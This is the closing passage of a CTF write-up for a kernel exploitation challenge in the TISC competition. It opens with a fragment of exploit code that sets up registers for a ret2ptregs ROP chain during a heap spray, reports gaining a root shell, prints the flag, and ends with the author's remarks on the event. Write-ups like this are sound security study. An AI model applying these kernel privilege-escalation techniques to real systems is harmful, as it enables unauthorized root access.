        // setup registers for ret2ptregs
        __asm__(
            "mov r15, pop_rsp_ret;"
            "mov r14, rop_addr;"
        );
        read(spray[i], buf, 32);
    }
}

This method is explained in greater depth in this write-up of babydriver. During the CTF, I neglected to spray the heap from the same CPU. This made my exploit extremely unreliable, with a success rate of approximately 1/32.

After a few attempts, we manage to land a root shell!

Flag: TISC{it_was_SPECTRE_all_along...at_least_we_stopped_him_for_now}

Remarks

I really enjoyed playing TISC this year. As a Pwn main, the three Pwn challenges in the later levels were fun to solve – two novel environments (Radare2 plugin and Verona sandbox) and one kernel pwn (this is actually my first official kpwn solve in a live CTF!). While the two Web3 challenges in the Reversing track might have thrown off some competitors, I was quite lucky to have studied Web3 for a while now. At the same time, the hardware challenges were well-designed and thought-provoking. Great job to the TISC team for organizing the event!

Maybe next year I will finally set a challenge…